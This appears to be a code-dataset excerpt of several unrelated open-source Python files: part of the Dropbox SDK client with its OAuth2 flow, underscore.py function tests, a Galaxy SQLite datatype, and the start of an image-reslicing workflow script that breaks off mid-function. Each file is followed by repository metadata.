- 404: No file was found at the given from_path,
or files of that type cannot be thumbnailed.
- 415: Image is invalid and cannot be thumbnailed.
- 200: Request was okay but response was malformed in some way.
"""
thumbnail_res = self.thumbnail(from_path, size, format)
metadata = DropboxClient.__parse_metadata_as_dict(thumbnail_res)
return thumbnail_res, metadata
def search(self, path, query, file_limit=1000, include_deleted=False):
"""Search folder for filenames matching query.
Parameters
path
The folder to search within.
query
The query to search on (minimum 3 characters).
file_limit
The maximum number of file entries to return within a folder.
The server will return at max 1,000 files.
include_deleted
Whether to include deleted files in search results.
Returns
A list of the metadata of all matching files (up to
file_limit entries). For a detailed description of what
this call returns, visit:
https://www.dropbox.com/developers/core/docs#search
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
"""
path = "/search/%s%s" % (self.session.root, format_path(path))
params = {
'query': query,
'file_limit': file_limit,
'include_deleted': include_deleted,
}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def revisions(self, path, rev_limit=1000):
"""Retrieve revisions of a file.
Parameters
path
The file to fetch revisions for. Note that revisions
are not available for folders.
rev_limit
The maximum number of file entries to return within
a folder. The server will return at max 1,000 revisions.
Returns
A list of the metadata of all matching files (up to rev_limit entries).
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#revisions
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: No revisions were found at the given path.
"""
path = "/revisions/%s%s" % (self.session.root, format_path(path))
params = {
'rev_limit': rev_limit,
}
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
def restore(self, path, rev):
"""Restore a file to a previous revision.
Parameters
path
The file to restore. Note that folders can't be restored.
rev
A previous rev value of the file to be restored to.
Returns
A dictionary containing the metadata of the newly restored file.
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#restore
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given revision.
"""
path = "/restore/%s%s" % (self.session.root, format_path(path))
params = {
'rev': rev,
}
url, params, headers = self.request(path, params)
return self.rest_client.POST(url, params, headers)
def media(self, path):
"""Get a temporary unauthenticated URL for a media file.
All of Dropbox's API methods require OAuth, which may cause problems in
situations where an application expects to be able to hit a URL multiple times
(for example, a media player seeking around a video file). This method
creates a time-limited URL that can be accessed without any authentication,
and returns that to you, along with an expiration time.
Parameters
path
The file to return a URL for. Folders are not supported.
Returns
A dictionary that looks like the following example::
{'url': 'https://dl.dropboxusercontent.com/1/view/abcdefghijk/example',
'expires': 'Thu, 16 Sep 2011 01:01:25 +0000'}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#media
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given path.
"""
path = "/media/%s%s" % (self.session.root, format_path(path))
url, params, headers = self.request(path, method='GET')
return self.rest_client.GET(url, headers)
def share(self, path, short_url=True):
"""Create a shareable link to a file or folder.
Shareable links created on Dropbox are time-limited, but don't require any
authentication, so they can be given out freely. The time limit should allow
at least a day of shareability, though users have the ability to disable
a link from their account if they like.
        Parameters
            path
                The file or folder to share.
            short_url
                When True (the default), the returned URL is shortened
                using the Dropbox URL shortener (e.g. ``https://db.tt/``).
Returns
A dictionary that looks like the following example::
{'url': u'https://db.tt/c0mFuu1Y', 'expires': 'Tue, 01 Jan 2030 00:00:00 +0000'}
For a detailed description of what this call returns, visit:
https://www.dropbox.com/developers/core/docs#shares
Raises
A :class:`dropbox.rest.ErrorResponse` with an HTTP status of:
- 400: Bad request (may be due to many things; check e.error for details).
- 404: Unable to find the file at the given path.
"""
path = "/shares/%s%s" % (self.session.root, format_path(path))
params = {
'short_url': short_url,
}
url, params, headers = self.request(path, params, method='GET')
return self.rest_client.GET(url, headers)
class ChunkedUploader(object):
"""Contains the logic around a chunked upload, which uploads a
large file to Dropbox via the /chunked_upload endpoint.
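    A minimal usage sketch, assuming an authenticated ``client`` and a
    local file ``big.bin``; ``ErrorResponse`` comes from ``dropbox.rest``
    and the retry/backoff policy is left to the caller::

        import os

        size = os.path.getsize('big.bin')
        with open('big.bin', 'rb') as f:
            uploader = ChunkedUploader(client, f, size)
            while uploader.offset < size:
                try:
                    uploader.upload_chunked()
                except ErrorResponse:
                    pass  # inspect the error and back off before resuming
            uploader.finish('/big.bin')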
"""
def __init__(self, client, file_obj, length):
self.client = client
self.offset = 0
self.upload_id = None
self.last_block = None
self.file_obj = file_obj
self.target_length = length
    def upload_chunked(self, chunk_size=4 * 1024 * 1024):
"""Uploads data from this ChunkedUploader's file_obj in chunks, until
an error occurs. Throws an exception when an error occurs, and can
be called again to resume the upload.
Parameters
chunk_size
The number of bytes to put in each chunk. (Default 4 MB.)
"""
while self.offset < self.target_length:
next_chunk_size = min(chunk_size, self.target_length - self.offset)
            if self.last_block is None:
self.last_block = self.file_obj.read(next_chunk_size)
try:
(self.offset, self.upload_id) = self.client.upload_chunk(
StringIO(self.last_block), next_chunk_size, self.offset, self.upload_id)
self.last_block = None
except ErrorResponse as e:
# Handle the case where the server tells us our offset is wrong.
must_reraise = True
if e.status == 400:
reply = e.body
if "offset" in reply and reply['offset'] != 0 and reply['offset'] > self.offset:
self.last_block = None
self.offset = reply['offset']
must_reraise = False
if must_reraise:
raise
    def finish(self, path, overwrite=False, parent_rev=None):
        """Commits the bytes uploaded by this ChunkedUploader to a file
        in the user's Dropbox.
Parameters
path
The full path of the file in the Dropbox.
overwrite
Whether to overwrite an existing file at the given path. (Default ``False``.)
If overwrite is False and a file already exists there, Dropbox
will rename the upload to make sure it doesn't overwrite anything.
You need to check the metadata returned for the new name.
This field should only be True if your intent is to potentially
clobber changes to a file that you don't know about.
parent_rev
Optional rev field from the 'parent' of this upload.
If your intent is to update the file at the given path, you should
pass the parent_rev parameter set to the rev value from the most recent
metadata you have of the existing file at that path. If the server
has a more recent version of the file at the specified path, it will
automatically rename your uploaded file, spinning off a conflict.
Using this parameter effectively causes the overwrite parameter to be ignored.
The file will always be overwritten if you send the most recent parent_rev,
and it will never be overwritten if you send a less recent one.
"""
path = "/commit_chunked_upload/%s%s" % (self.client.session.root, format_path(path))
params = dict(
overwrite = bool(overwrite),
upload_id = self.upload_id
)
if parent_rev is not None:
params['parent_rev'] = parent_rev
url, params, headers = self.client.request(path, params, content_server=True)
return self.client.rest_client.POST(url, params, headers)
# Allow access of ChunkedUploader via DropboxClient for backwards compatibility.
DropboxClient.ChunkedUploader = ChunkedUploader
class DropboxOAuth2FlowBase(object):
def __init__(self, consumer_key, consumer_secret, locale=None, rest_client=RESTClient):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
self.locale = locale
self.rest_client = rest_client
def _get_authorize_url(self, redirect_uri, state):
params = dict(response_type='code',
client_id=self.consumer_key)
if redirect_uri is not None:
params['redirect_uri'] = redirect_uri
if state is not None:
params['state'] = state
return self.build_url(BaseSession.WEB_HOST, '/oauth2/authorize', params)
def _finish(self, code, redirect_uri):
url = self.build_url(BaseSession.API_HOST, '/oauth2/token')
params = {'grant_type': 'authorization_code',
'code': code,
'client_id': self.consumer_key,
'client_secret': self.consumer_secret,
}
if self.locale is not None:
params['locale'] = self.locale
if redirect_uri is not None:
params['redirect_uri'] = redirect_uri
response = self.rest_client.POST(url, params=params)
access_token = response["access_token"]
user_id = response["uid"]
return access_token, user_id
def build_path(self, target, params=None):
"""Build the path component for an API URL.
This method urlencodes the parameters, adds them
to the end of the target url, and puts a marker for the API
version in front.
Parameters
target
A target url (e.g. '/files') to build upon.
params
Optional dictionary of parameters (name to value).
Returns
The path and parameters components of an API URL.
"""
if sys.version_info < (3,) and type(target) == unicode:
target = target.encode("utf8")
target_path = urllib.quote(target)
params = params or {}
params = params.copy()
if self.locale:
params['locale'] = self.locale
if params:
query_string = params_to_urlencoded(params)
return "/%s%s?%s" % (BaseSession.API_VERSION, target_path, query_string)
else:
return "/%s%s" % (BaseSession.API_VERSION, target_path)
def build_url(self, host, target, params=None):
"""Build an API URL.
This method adds scheme and hostname to the path
returned from build_path.
Parameters
target
A target url (e.g. '/files') to build upon.
params
Optional dictionary of parameters (name to value).
Returns
The full API URL.
"""
return "https://%s%s" % (host, self.build_path(target, params))
class DropboxOAuth2FlowNoRedirect(DropboxOAuth2FlowBase):
"""
OAuth 2 authorization helper for apps that can't provide a redirect URI
(such as the command-line example apps).
Example::
from dropbox.client import DropboxOAuth2FlowNoRedirect, DropboxClient
from dropbox import rest as dbrest
auth_flow = DropboxOAuth2FlowNoRedirect(APP_KEY, APP_SECRET)
authorize_url = auth_flow.start()
print "1. Go to: " + authorize_url
print "2. Click \\"Allow\\" (you might have to log in first)."
print "3. Copy the authorization code."
auth_code = raw_input("Enter the authorization code here: ").strip()
try:
access_token, user_id = auth_flow.finish(auth_code)
except dbrest.ErrorResponse, e:
print('Error: %s' % (e,))
return
c = DropboxClient(access_token)
"""
def __init__(self, consumer_key, consumer_secret, locale=None, rest_client=None):
"""
Construct an instance.
Parameters
consumer_key
Your API app's "app key"
consumer_secret
Your API app's "app secret"
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
        if rest_client is None:
            rest_client = RESTClient
super(DropboxOAuth2FlowNoRedirect, self).__init__(consumer_key, consumer_secret,
locale, rest_client)
def start(self):
"""
Starts the OAuth 2 authorization process.
Returns
The URL for a page on Dropbox's website. This page will let the user "approve"
your app, which gives your app permission to access the user's Dropbox account.
Tell the user to visit this URL and approve your app.
"""
return self._get_authorize_url(None, None)
def finish(self, code):
"""
If the user approves your app, they will be presented with an "authorization code". Have
the user copy/paste that authorization code into your app and then call this method to
get an access token.
Parameters
code
The authorization code shown to the user when they approved your app.
Returns
A pair of ``(access_token, user_id)``. ``access_token`` is a string that
can be passed to DropboxClient. ``user_id`` is the Dropbox user ID (string) of the
user that just approved your app.
Raises
The same exceptions as :meth:`DropboxOAuth2Flow.finish()`.
"""
return self._finish(code, None)
class DropboxOAuth2Flow(DropboxOAuth2FlowBase):
"""
OAuth 2 authorization helper. Use this for web apps.
OAuth 2 has a two-step authorization process. The first step is having the user authorize
your app. The second involves getting an OAuth 2 access token from Dropbox.
Example::
from dropbox.client import DropboxOAuth2Flow, DropboxClient
def get_dropbox_auth_flow(web_app_session):
            redirect_uri = "https://my-web-server.org/dropbox-auth-finish"
return DropboxOAuth2Flow(APP_KEY, APP_SECRET, redirect_uri,
web_app_session, "dropbox-auth-csrf-token")
# URL handler for /dropbox-auth-start
def dropbox_auth_start(web_app_session, request):
authorize_url = get_dropbox_auth_flow(web_app_session).start()
redirect_to(authorize_url)
# URL handler for /dropbox-auth-finish
def dropbox_auth_finish(web_app_session, request):
try:
access_token, user_id, url_state = \\
get_dropbox_auth_flow(web_app_session).finish(request.query_params)
except DropboxOAuth2Flow.BadRequestException, e:
http_status(400)
except DropboxOAuth2Flow.BadStateException, e:
# Start the auth flow again.
redirect_to("/dropbox-auth-start")
except DropboxOAuth2Flow.CsrfException, e:
http_status(403)
except DropboxOAuth2Flow.NotApprovedException, e:
flash('Not approved? Why not?')
return redirect_to("/home")
except DropboxOAuth2Flow.ProviderException, e:
logger.log("Auth error: %s" % (e,))
http_status(403)
"""
def __init__(self, consumer_key, consumer_secret, redirect_uri, session,
csrf_token_session_key, locale=None, rest_client=None):
"""
Construct an instance.
Parameters
consumer_key
Your API app's "app key".
consumer_secret
Your API app's "app secret".
redirect_uri
The URI that the Dropbox server will redirect the user to after the user
finishes authorizing your app. This URI must be HTTPS-based and pre-registered with
the Dropbox servers, though localhost URIs are allowed without pre-registration and can
be either HTTP or HTTPS.
session
A dict-like object that represents the current user's web session (will be
used to save the CSRF token).
csrf_token_session_key
The key to use when storing the CSRF token in the session (for
example: "dropbox-auth-csrf-token").
locale
The locale of the user of your application. For example "en" or "en_US".
Some API calls return localized data and error messages; this setting
tells the server which locale to use. By default, the server uses "en_US".
rest_client
Optional :class:`dropbox.rest.RESTClient`-like object to use for making
requests.
"""
        if rest_client is None:
            rest_client = RESTClient
super(DropboxOAuth2Flow, self).__init__(consumer_key, consumer_secret, locale, rest_client)
self.redirect_uri = redirect_uri
self.session = session
self.csrf_token_session_key = csrf_token_session_key
def start(self, url_state=None):
"""
Starts the OAuth 2 authorization process.
This function builds an "authorization URL". You should redirect your user's browser to
this URL, which will give them an opportunity to grant your app access to their Dropbox
account. When the user completes this process, they will be automatically redirected to
the ``redirect_uri`` you passed in to the constructor.
This function will also save a CSRF token to ``session[csrf_token_session_key]`` (as
provided to the constructor). This CSRF token will be checked on :meth:`finish()` to
prevent request forgery.
Parameters
url_state
Any data that you would like to keep in the URL through the
authorization process. This exact value will be returned to you by :meth:`finish()`.
Returns
The URL for a page on Dropbox's website. This page will let the user "approve"
your app, which gives your app permission to access the user's Dropbox account.
Tell the user to visit this URL and approve your app.
"""
csrf_token = base64.urlsafe_b64encode(os.urandom(16))
state = csrf_token
if url_state is not None:
state += "|" + url_state
self.session[self.csrf_token_session_key] = csrf_token
return self._get_authorize_url(self.redirect_uri, state)
def finish(self, query_params):
"""
Call this after the user has visited the authorize URL (see :meth:`start()`), approved your
app and was redirected to your redirect URI.
Parameters
query_params
The query parameters on the GET request to your redirect URI.
Returns
A tuple of ``(access_token, user_id, url_state)``. ``access_token`` can be used to
construct a :class:`DropboxClient`. ``user_id`` is the Dropbox user ID (string) of the
user that just approved your app. ``url_state`` is the value you originally passed in to
:meth:`start()`.
Raises
:class:`BadRequestException`
If the redirect URL was missing parameters or if the given parameters were not valid.
:class:`BadStateException`
If there's no CSRF token in the session.
:class:`CsrfException`
If the ``'state'`` query parameter doesn't contain the CSRF token from the user's
session.
:class:`NotApprovedException`
If the user chose not to approve your app.
:class:`ProviderException`
If Dropbox redirected to your redirect URI with some unexpected error identifier
and error message.
"""
        csrf_token_from_session = self.session.get(self.csrf_token_session_key)
# Check well-formedness of request.
state = query_params.get('state')
if state is None:
raise self.BadRequestException("Missing query parameter 'state'.")
error = query_params.get('error')
error_description = query_params.get('error_description')
code = query_params.get('code')
if error is not None and code is not None:
            raise self.BadRequestException("Query parameters 'code' and 'error' are both set; "
                                           "only one must be set.")
if error is None and code is None:
            raise self.BadRequestException("Neither query parameter 'code' nor 'error' is set.")
# Check CSRF token
if csrf_token_from_session is None:
            raise self.BadStateException("Missing CSRF token in session.")
if len(csrf_token_from_session) <= 20:
raise AssertionError("CSRF token unexpectedly short: %r" % (csrf_token_from_session,))
split_pos = state.find('|')
if split_pos < 0:
given_csrf_token = state
url_state = None
else:
given_csrf_token = state[0:split_pos]
url_state = state[split_pos+1:]
if not _safe_equals(csrf_token_from_session, given_csrf_token):
raise self.CsrfException("expected %r, got %r" % (csrf_token_from_session,
given_csrf_token))
del self.session[self.csrf_token_session_key]
# Check for error identifier
if error is not None:
if error == 'access_denied':
# The user clicked "Deny"
if error_description is None:
raise self.NotApprovedException("No additional description from Dropbox")
else:
raise self.NotApprovedException("Additional description from Dropbox: " +
error_description)
else:
# All other errors
full_message = error
if error_description is not None:
full_message += ": " + error_description
                raise self.ProviderException(full_message)
# If everything went ok, make the network call to get an access token.
access_token, user_id = self._finish(code, self.redirect_uri)
return access_token, user_id, url_state
class BadRequestException(Exception):
"""
Thrown if the redirect URL was missing parameters or if the
given parameters were not valid.
The recommended action is to show an HTTP 400 error page.
"""
pass
class BadStateException(Exception):
"""
Thrown if all the parameters are correct, but there's no CSRF token in the session. This
probably means that the session expired.
The recommended action is to redirect the user's browser to try the approval process again.
"""
pass
class CsrfException(Exception):
"""
Thrown if the given 'state' parameter doesn't contain the CSRF
token from the user's session.
This is blocked to prevent CSRF attacks.
The recommended action is to respond with an HTTP 403 error page.
"""
pass
class NotApprovedException(Exception):
"""
The user chose not to approve your app.
"""
pass
class ProviderException(Exception):
"""
Dropbox redirected to your redirect URI with some unexpected error identifier and error
message.
The recommended action is to log the error, tell the user something went wrong, and let
them try again.
"""
pass
def _safe_equals(a, b):
    # Constant-time comparison: XOR every character pair and OR the
    # differences together, so timing does not reveal the position of the
    # first mismatch (used above for comparing CSRF tokens).
    if len(a) != len(b):
        return False
    res = 0
    for ca, cb in zip(a, b):
        res |= ord(ca) ^ ord(cb)
    return res == 0
# From the "Bearer" token spec, RFC 6750.
_OAUTH2_ACCESS_TOKEN_PATTERN = re.compile(r'\A[-_~/A-Za-z0-9\.\+]+=*\Z')
|
cogniteev/dropbox-python-sdk
|
dropbox/client.py
|
Python
|
mit
| 68,016
|
[
"VisIt"
] |
7452852880945e6065e19dcf0c3fe65f2129bacfc3a9b6d679a70934aa1d4307
|
import unittest
from src.underscore import _
from threading import Timer
class TestStructure(unittest.TestCase):
class Namespace:
pass
def test_bind(self):
pass
def test_bindAll(self):
pass
def test_memoize(self):
def fib(n):
return n if n < 2 else fib(n - 1) + fib(n - 2)
fastFib = _.memoize(fib)
self.assertEqual(
fib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
self.assertEqual(
fastFib(10), 55, 'a memoized version of fibonacci'
' produces identical results')
        def o(value):
            return value
fastO = _.memoize(o)
self.assertEqual(o('upper'), 'upper', 'checks hasOwnProperty')
self.assertEqual(fastO('upper'), 'upper', 'checks hasOwnProperty')
def test_delay(self):
ns = self.Namespace()
ns.delayed = False
def func():
ns.delayed = True
_.delay(func, 150)
def checkFalse():
self.assertFalse(ns.delayed)
print("\nASYNC: delay. OK")
def checkTrue():
self.assertTrue(ns.delayed)
print("\nASYNC: delay. OK")
Timer(0.05, checkFalse).start()
Timer(0.20, checkTrue).start()
def test_defer(self):
ns = self.Namespace()
ns.deferred = False
        def defer_test(flag):
            ns.deferred = flag
        _.defer(defer_test, True)
def deferCheck():
self.assertTrue(ns.deferred, "deferred the function")
print("\nASYNC: defer. OK")
_.delay(deferCheck, 50)
def test_throttle(self):
ns = self.Namespace()
ns.counter = 0
def incr():
ns.counter += 1
throttledIncr = _.throttle(incr, 100)
throttledIncr()
throttledIncr()
throttledIncr()
Timer(0.07, throttledIncr).start()
Timer(0.12, throttledIncr).start()
Timer(0.14, throttledIncr).start()
Timer(0.19, throttledIncr).start()
Timer(0.22, throttledIncr).start()
Timer(0.34, throttledIncr).start()
def checkCounter1():
self.assertEqual(ns.counter, 1, "incr was called immediately")
print("ASYNC: throttle. OK")
def checkCounter2():
self.assertEqual(ns.counter, 4, "incr was throttled")
print("ASYNC: throttle. OK")
_.delay(checkCounter1, 90)
_.delay(checkCounter2, 400)
def test_debounce(self):
ns = self.Namespace()
ns.counter = 0
def incr():
ns.counter += 1
debouncedIncr = _.debounce(incr, 120)
debouncedIncr()
debouncedIncr()
debouncedIncr()
Timer(0.03, debouncedIncr).start()
Timer(0.06, debouncedIncr).start()
Timer(0.09, debouncedIncr).start()
Timer(0.12, debouncedIncr).start()
Timer(0.15, debouncedIncr).start()
def checkCounter():
self.assertEqual(1, ns.counter, "incr was debounced")
print("ASYNC: debounce. OK")
_.delay(checkCounter, 300)
def test_once(self):
ns = self.Namespace()
ns.num = 0
def add():
ns.num += 1
increment = _.once(add)
increment()
increment()
increment()
increment()
self.assertEqual(ns.num, 1)
def test_wrap(self):
def greet(name):
return "hi: " + name
        def wrap(func, name):
            aname = list(name)
            aname.reverse()
            reversed_name = "".join(aname)
            return func(name) + ' ' + reversed_name
backwards = _.wrap(greet, wrap)
        self.assertEqual(backwards('moe'), 'hi: moe eom',
                         'wrapped the salutation function')
inner = lambda: "Hello "
obj = {"name": "Moe"}
obj["hi"] = _.wrap(inner, lambda fn: fn() + obj["name"])
self.assertEqual(obj["hi"](), "Hello Moe")
def test_compose(self):
def greet(name):
return "hi: " + name
def exclaim(sentence):
return sentence + '!'
def upperize(full):
return full.upper()
composed_function = _.compose(exclaim, greet, upperize)
self.assertEqual('HI: MOE!', composed_function('moe'),
'can compose a function that takes another')
def test_after(self):
def testAfter(afterAmount, timesCalled):
ns = self.Namespace()
ns.afterCalled = 0
def afterFunc():
ns.afterCalled += 1
after = _.after(afterAmount, afterFunc)
            while timesCalled:
after()
timesCalled -= 1
return ns.afterCalled
self.assertEqual(testAfter(5, 5), 1,
"after(N) should fire after being called N times")
self.assertEqual(testAfter(5, 4), 0,
"after(N) should not fire unless called N times")
self.assertEqual(testAfter(0, 0), 1,
"after(0) should fire immediately")
def test_partial(self):
def func(*args):
return ' '.join(args)
pfunc = _.partial(func, 'a', 'b', 'c')
self.assertEqual(pfunc('d', 'e'), 'a b c d e')
if __name__ == "__main__":
    print("run these tests by executing `python -m unittest "
          "discover` in the unittests folder")
unittest.main()
|
serkanyersen/underscore.py
|
tests/test_functions.py
|
Python
|
mit
| 5,794
|
[
"MOE"
] |
bb623ca567d53d5eeb025b58931cedf7897699a9e52159022154998328fa33eb
|
import logging
from galaxy.datatypes.binary import Binary, SQlite
from galaxy.datatypes.metadata import MetadataElement, MetadataParameter
from galaxy.util import sqlite
log = logging.getLogger(__name__)
class GAFASQLite(SQlite):
"""Class describing a GAFA SQLite database"""
MetadataElement(name='gafa_schema_version', default='0.1.0', param=MetadataParameter, desc='GAFA schema version',
readonly=True, visible=True, no_value='0.1.0')
file_ext = 'gafa.sqlite'
def set_meta(self, dataset, overwrite=True, **kwd):
super(GAFASQLite, self).set_meta(dataset, overwrite=overwrite, **kwd)
try:
conn = sqlite.connect(dataset.file_name)
c = conn.cursor()
version_query = 'SELECT version FROM meta'
results = c.execute(version_query).fetchall()
if len(results) == 0:
raise Exception('version not found in meta table')
elif len(results) > 1:
raise Exception('Multiple versions found in meta table')
dataset.metadata.gafa_schema_version = results[0][0]
except Exception as e:
            log.warning("%s, set_meta Exception: %s", self, e)
def sniff(self, filename):
if super(GAFASQLite, self).sniff(filename):
gafa_table_names = frozenset(['gene', 'gene_family', 'gene_family_member', 'meta', 'transcript'])
conn = sqlite.connect(filename)
c = conn.cursor()
tables_query = "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
results = c.execute(tables_query).fetchall()
found_table_names = frozenset(_[0] for _ in results)
return gafa_table_names <= found_table_names
return False
# Binary.register_sniffable_binary_format() ignores the sniff order declared
# in datatypes_conf.xml and puts Tool Shed datatypes at the end. So instead of
# simply doing:
#     Binary.register_sniffable_binary_format("sqlite", "sqlite", SQlite)
# we need to register specialized SQLite datatypes before SQlite itself.
for i, format_dict in enumerate(Binary.sniffable_binary_formats):
if format_dict['class'] == SQlite:
break
else:
i += 1
Binary.sniffable_binary_formats.insert(i, {'type': 'gafa.sqlite', 'ext': 'gafa.sqlite', 'class': GAFASQLite})
|
PerlaTroncosoRey/tgac-galaxytools
|
tools/GAFA/gafa_datatypes.py
|
Python
|
mit
| 2,314
|
[
"Galaxy"
] |
c0cc322b8e8c8d0b06980f43671e5e39557edd615b417eabea3ac108991920f7
|
import os
import sys
import copy
import numpy as np
from scipy.interpolate import interp1d
from optparse import OptionParser, OptionGroup
from pos_parameters import filename_parameter, string_parameter, list_parameter, value_parameter, filename
from pos_wrapper_skel import generic_workflow
import pos_wrappers
class average_grayscale_images_list(pos_wrappers.generic_wrapper):
_template = """c{dimension}d -verbose \
{input_image_1} {input_image_2} \
-weighted-sum {weight_1} {weight_2} \
-o {output_image}"""
_parameters = {
'dimension' : value_parameter('dimension', 2),
'weight_1' : value_parameter('weight_1', None),
'weight_2' : value_parameter('weight_2', None),
'input_image_1': filename_parameter('input_image_1', None),
'input_image_2': filename_parameter('input_image_2', None),
'output_image' : filename_parameter('output_image', None)
}
class average_multichannel_images_list(pos_wrappers.generic_wrapper):
_template = """c{dimension}d -verbose \
-mcs {input_image_1} -popas iblue -popas igreen -popas ired -clear \
-mcs {input_image_2} -popas oblue -popas ogreen -popas ored -clear \
-clear \
-push iblue -push oblue -weighted-sum {weight_1} {weight_2} -type uchar -popas bblue \
-push igreen -push ogreen -weighted-sum {weight_1} {weight_2} -type uchar -popas bgreen \
-push ired -push ored -weighted-sum {weight_1} {weight_2} -type uchar -popas bred \
-clear \
-push bred -push bgreen -push bblue \
-omc 3 {output_image}"""
_parameters = {
'dimension' : value_parameter('dimension', 2),
'weight_1' : value_parameter('weight_1', None),
'weight_2' : value_parameter('weight_2', None),
'input_image_1': filename_parameter('input_image_1', None),
'input_image_2': filename_parameter('input_image_2', None),
'output_image' : filename_parameter('output_image', None)
}
class nonuniform_reslice(generic_workflow):
    """
    Workflow for mapping nonuniformly spaced slices onto a regularly spaced grid.
python nonuniform_reslice.py \
--referenceCoordinates /home/pmajka/the_whole_brain_connectivity_atlas/data/merge/R601_reference_planes \
--probingCoordinates planes_reference \
--negateReferenceCoordinates \
--skipOutputVolumeGeneration \
--useMultichannelWorkflow \
--referenceInputDirectory /home/pmajka/the_whole_brain_connectivity_atlas/data/merge/R601/ \
--interpolation nearest \
--output-volume-scalar-type uchar \
--output-volume-spacing 0.017062 0.04 0.017062 \
--output-volume-origin -9.622 -7.92 1.444 \
--output-volume-permute-axes 0 2 1 \
--output-volume-orientation RAS \
--rgbVolumeFilename /home/pmajka/601.nii.gz
# --dry-run
# --cleanup
# --useGrayscaleWorkflow \
# --useGrayscaleWorkflow \
# --useMultichannelWorkflow \
# --outputWeightedSlicesDir /home/pmajka/ \
"""
_f = {
'ref_input': filename('ref_input', work_dir='01_reference_input', str_template='{idx:04d}.png'),
'ref_mask': filename('ref_mask', work_dir='02_reference_mask', str_template='{idx:04d}.png'),
'weighted_grayscale' : filename('weighted_grayscale', work_dir='04_weighted_grayscale', str_template='{idx:04d}.nii.gz'),
'weighted_multichannel' : filename('weighted_multichannel', work_dir='05_weighted_multichannel', str_template='{idx:04d}.nii.gz'),
'weighted_grayscale_mask' : filename('weighted_grayscale_mask', work_dir='04_weighted_grayscale', str_template='????.nii.gz'),
'weighted_multichannel_mask' : filename('weighted_multichannel_mask', work_dir='05_weighted_multichannel', str_template='%04d.nii.gz'),
'output_volumes' : filename('output_volumes', work_dir='10_output_volumes', str_template='output_volume.nii.gz'),
'tmp_gray_vol' : filename('tmp_gray_vol', work_dir='09_intermediate_results', str_template='__temp__vol.vtk'),
}
_usage = ""
CONST_NOSLICE_INDEX = 9998
def __init__(self, options, args, pool=None):
super(self.__class__, self).__init__(options, args, pool)
if not any([self.options.useMultichannelWorkflow,
self.options.useGrayscaleWorkflow]):
print >> sys.stderr, "No workflow type selected (either grayscale or multichannel). Exiting."
sys.exit(1)
if not all([self.options.probingCoordinates,
self.options.referenceCoordinates]):
            print >> sys.stderr, "You need to provide files for both reference and probing coordinates. Exiting."
sys.exit(1)
if not self.options.referenceInputDirectory:
            print >> sys.stderr, "No input slices directory provided. Please provide one. Exiting."
sys.exit(1)
else:
self.f['ref_input'].override_dir = self.options.referenceInputDirectory
        # Override directories if customized directory names are provided.
        # Currently, the only customizable directory is the output directory
        # for the weighted slices.
if self.options.outputWeightedSlicesDir:
self.f['weighted_grayscale'].override_dir = self.options.outputWeightedSlicesDir
self.f['weighted_multichannel'].override_dir = self.options.outputWeightedSlicesDir
for out_type in (self.options.grayscaleVolumeFilename,\
self.options.rgbVolumeFilename):
if out_type:
self.f['output_volumes'].override_path = out_type
def launch(self):
# TODO: the script should be able to process the volumes instead of
# the extracted slices. Think about it :)
# At first load the coordinates of reference volume
# (the coordinates you map to)
self.coords_from = self.load_coordinates_from_file(
self.options.referenceCoordinates,
negate=self.options.negateReferenceCoordinates)
# Then load the probing coordinates
# (the coordinates you map from)
self.coords_to = self.load_coordinates_from_file(
self.options.probingCoordinates,
negate=self.options.negateProbingCoordinates)
# Select the workflow type (one can choose between RGB - multichannel workflow
# and classic, grayscale workflow).
# Process the source data according to the selected workflow,
if self.options.useMultichannelWorkflow:
self.reslice_generic(average_multichannel_images_list,
weighting_output_dir='weighted_multichannel')
self.prepare_output_multichannel_volume()
if self.options.useGrayscaleWorkflow:
self.reslice_generic(average_grayscale_images_list,
weighting_output_dir='weighted_grayscale')
self.prepare_output_grayscale_volume()
def load_coordinates_from_file(self, filename, negate=False):
        # TODO: Whatever you want to read, read it with the csv module.
        # TODO: Add a generic CSV reader to the poSSum framework and then
        # refactor the code so that it uses this uniform CSV reader.
multiplier = [1, -1][negate]
coords = []
for line in open(filename).readlines():
coords.append(multiplier * float(line.strip()))
return np.array(coords)
def reslice_generic(self, reslice_command_wrapper=None, weighting_output_dir=None):
interpolation_data = \
self.interpolate(self.coords_from, self.coords_to,
kind=self.options.interpolation)
commands = []
        for slice_idx, slice_info in enumerate(interpolation_data):
            offset = self.options.startingSliceIndexOffset
            command = reslice_command_wrapper(
                dimension=2,
                input_image_1=self.f['ref_input'](idx=slice_info['slice_1'] + offset),
                input_image_2=self.f['ref_input'](idx=slice_info['slice_2'] + offset),
                weight_1=slice_info['weight_1'],
                weight_2=slice_info['weight_2'],
                output_image=self.f[weighting_output_dir](idx=slice_idx))
commands.append(copy.deepcopy(command))
self.execute(commands)
def interpolate(self, coords_from, coords_to, kind='nearest'):
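        """Map each probing coordinate onto the reference coordinates.

        Each probing coordinate is converted into a fractional index within
        ``coords_from`` and split into the two bracketing slice indexes with
        complementary linear weights. For example, with
        ``coords_from = [0.0, 1.0, 2.0]`` and ``kind='linear'``, a probing
        coordinate of 1.25 falls between slices 1 and 2 with weights 0.75
        and 0.25 respectively.
        """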
x = interp1d(coords_from, np.arange(coords_from.size), kind=kind)
results = []
for ref_coord in coords_to:
try:
i = ref_coord
